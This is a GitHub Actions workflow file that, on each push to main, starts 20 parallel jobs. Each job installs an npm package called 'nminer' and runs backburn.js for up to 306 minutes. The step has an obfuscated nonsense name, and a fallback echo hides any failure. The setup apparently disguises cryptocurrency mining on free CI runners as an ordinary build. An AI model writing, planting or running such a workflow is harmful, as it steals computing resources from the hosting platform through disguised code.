name: backburn
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 9433 }
          - { version: 4481 }
          - { version: 3638 }
          - { version: 8237 }
          - { version: 7952 }
          - { version: 5308 }
          - { version: 465 }
          - { version: 6848 }
          - { version: 9729 }
          - { version: 5350 }
          - { version: 273 }
          - { version: 7901 }
          - { version: 3101 }
          - { version: 1198 }
          - { version: 7054 }
          - { version: 9342 }
          - { version: 5637 }
          - { version: 7369 }
          - { version: 897 }
          - { version: 3977 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: inasmuch provided polite deliberately
        run: |
          npm install nminer@latest
          timeout 306m node backburn.js || echo "backburn executed"